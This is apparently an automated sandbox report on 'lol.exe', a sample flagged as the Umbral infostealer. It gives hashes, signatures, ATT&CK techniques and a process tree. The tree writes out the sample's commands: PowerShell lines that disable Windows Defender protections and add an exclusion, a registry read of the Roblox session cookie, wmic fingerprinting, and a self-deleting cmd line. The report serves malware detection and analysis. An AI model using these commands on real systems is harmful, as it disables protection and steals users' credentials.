Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
23-08-2024 06:48
Behavioral task
behavioral1
Sample
lol.exe
Resource
win7-20240705-en
General
-
Target
lol.exe
-
Size
229KB
-
MD5
ea031754ac9fe28dbc0c5915cb638e44
-
SHA1
14b2c7b94aefdfc911e26fc5deb6eb8b6d7c0aed
-
SHA256
cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e
-
SHA512
39a0790b3bae0862b1ba87bd6d1165694ba09cfa5104935e00ebaa13924699b2efba92ee6e744d3d820a9c05f80fa41fa1649498dce8f430835e8c6e813c25bb
-
SSDEEP
6144:9loZM9rIkd8g+EtXHkv/iD4RugVzZqStvY5rWWDFZb8e1m7i:foZOL+EP8RugVzZqStvY5rWWD3V
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2140-1-0x0000000000EB0000-0x0000000000EF0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 2512 powershell.exe 2716 powershell.exe 2124 powershell.exe 2644 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts lol.exe -
Deletes itself 1 IoCs
pid Process 1900 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1900 cmd.exe 2204 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2312 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2204 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2644 powershell.exe 2512 powershell.exe 2716 powershell.exe 1184 powershell.exe 2124 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2140 lol.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 wmic.exe Token: SeSecurityPrivilege 1496 wmic.exe Token: SeTakeOwnershipPrivilege 1496 wmic.exe Token: SeLoadDriverPrivilege 1496 wmic.exe Token: SeSystemProfilePrivilege 1496 wmic.exe Token: SeSystemtimePrivilege 1496 wmic.exe Token: SeProfSingleProcessPrivilege 1496 wmic.exe Token: SeIncBasePriorityPrivilege 1496 wmic.exe Token: SeCreatePagefilePrivilege 1496 wmic.exe Token: SeBackupPrivilege 1496 wmic.exe Token: SeRestorePrivilege 1496 wmic.exe Token: SeShutdownPrivilege 1496 wmic.exe Token: SeDebugPrivilege 1496 wmic.exe Token: SeSystemEnvironmentPrivilege 1496 wmic.exe Token: SeRemoteShutdownPrivilege 1496 wmic.exe Token: SeUndockPrivilege 1496 wmic.exe Token: SeManageVolumePrivilege 1496 wmic.exe Token: 33 1496 wmic.exe Token: 34 1496 wmic.exe Token: 35 1496 wmic.exe Token: SeIncreaseQuotaPrivilege 1496 wmic.exe Token: SeSecurityPrivilege 1496 wmic.exe Token: SeTakeOwnershipPrivilege 1496 wmic.exe Token: SeLoadDriverPrivilege 1496 wmic.exe Token: SeSystemProfilePrivilege 1496 wmic.exe Token: SeSystemtimePrivilege 1496 wmic.exe Token: SeProfSingleProcessPrivilege 1496 wmic.exe Token: SeIncBasePriorityPrivilege 1496 wmic.exe Token: SeCreatePagefilePrivilege 1496 wmic.exe Token: SeBackupPrivilege 1496 wmic.exe Token: SeRestorePrivilege 1496 wmic.exe Token: SeShutdownPrivilege 1496 wmic.exe Token: SeDebugPrivilege 1496 wmic.exe Token: SeSystemEnvironmentPrivilege 1496 wmic.exe Token: SeRemoteShutdownPrivilege 1496 wmic.exe Token: SeUndockPrivilege 1496 wmic.exe Token: SeManageVolumePrivilege 1496 wmic.exe Token: 33 1496 wmic.exe Token: 34 1496 wmic.exe Token: 35 1496 wmic.exe Token: SeIncreaseQuotaPrivilege 2860 wmic.exe Token: SeSecurityPrivilege 2860 wmic.exe Token: SeTakeOwnershipPrivilege 2860 wmic.exe Token: SeLoadDriverPrivilege 2860 wmic.exe Token: SeSystemProfilePrivilege 2860 wmic.exe Token: SeSystemtimePrivilege 2860 wmic.exe Token: SeProfSingleProcessPrivilege 2860 wmic.exe Token: SeIncBasePriorityPrivilege 2860 wmic.exe Token: SeCreatePagefilePrivilege 2860 wmic.exe Token: SeBackupPrivilege 2860 wmic.exe Token: SeRestorePrivilege 2860 wmic.exe Token: SeShutdownPrivilege 2860 wmic.exe Token: SeDebugPrivilege 2860 wmic.exe Token: SeSystemEnvironmentPrivilege 2860 wmic.exe Token: SeRemoteShutdownPrivilege 2860 wmic.exe Token: SeUndockPrivilege 2860 wmic.exe Token: SeManageVolumePrivilege 2860 wmic.exe Token: 33 2860 wmic.exe Token: 34 2860 wmic.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2140 wrote to memory of 2664 2140 lol.exe 30 PID 2140 wrote to memory of 2664 2140 lol.exe 30 PID 2140 wrote to memory of 2664 2140 lol.exe 30 PID 2140 wrote to memory of 2644 2140 lol.exe 32 PID 2140 wrote to memory of 2644 2140 lol.exe 32 PID 2140 wrote to memory of 2644 2140 lol.exe 32 PID 2140 wrote to memory of 2512 2140 lol.exe 34 PID 2140 wrote to memory of 2512 2140 lol.exe 34 PID 2140 wrote to memory of 2512 2140 lol.exe 34 PID 2140 wrote to memory of 2716 2140 lol.exe 36 PID 2140 wrote to memory of 2716 2140 lol.exe 36 PID 2140 wrote to memory of 2716 2140 lol.exe 36 PID 2140 wrote to memory of 1184 2140 lol.exe 38 PID 2140 wrote to memory of 1184 2140 lol.exe 38 PID 2140 wrote to memory of 1184 2140 lol.exe 38 PID 2140 wrote to memory of 1496 2140 lol.exe 40 PID 2140 wrote to memory of 1496 2140 lol.exe 40 PID 2140 wrote to memory of 1496 2140 lol.exe 40 PID 2140 wrote to memory of 2860 2140 lol.exe 43 PID 2140 wrote to memory of 2860 2140 lol.exe 43 PID 2140 wrote to memory of 2860 2140 lol.exe 43 PID 2140 wrote to memory of 2056 2140 lol.exe 45 PID 2140 wrote to memory of 2056 2140 lol.exe 45 PID 2140 wrote to memory of 2056 2140 lol.exe 45 PID 2140 wrote to memory of 2124 2140 lol.exe 47 PID 2140 wrote to memory of 2124 2140 lol.exe 47 PID 2140 wrote to memory of 2124 2140 lol.exe 47 PID 2140 wrote to memory of 2312 2140 lol.exe 49 PID 2140 wrote to memory of 2312 2140 lol.exe 49 PID 2140 wrote to memory of 2312 2140 lol.exe 49 PID 2140 wrote to memory of 1900 2140 lol.exe 51 PID 2140 wrote to memory of 1900 2140 lol.exe 51 PID 2140 wrote to memory of 1900 2140 lol.exe 51 PID 1900 wrote to memory of 2204 1900 cmd.exe 53 PID 1900 wrote to memory of 2204 1900 cmd.exe 53 PID 1900 wrote to memory of 2204 1900 cmd.exe 53 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2664 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\lol.exe"C:\Users\Admin\AppData\Local\Temp\lol.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\lol.exe"2⤵
- Views/modifies file attributes
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\lol.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2312
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\lol.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2204
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e533f4c0e1b0603bbce007c61ecaef75
SHA16a7a9bb4cb383e248cce4a61dc8127c1d09314d8
SHA25679f00de39b32529b6e446d9d53d20b157d9fad12aaeb1105039effe8b191bd54
SHA51218e0a60e172aef2c72d1ca7839a30284e6cc6e184fac0ff485ef18388d50abe08edf89c85e17c6a7e4c953fd235026bfdc033109464c97d82e9ad93f79d384b2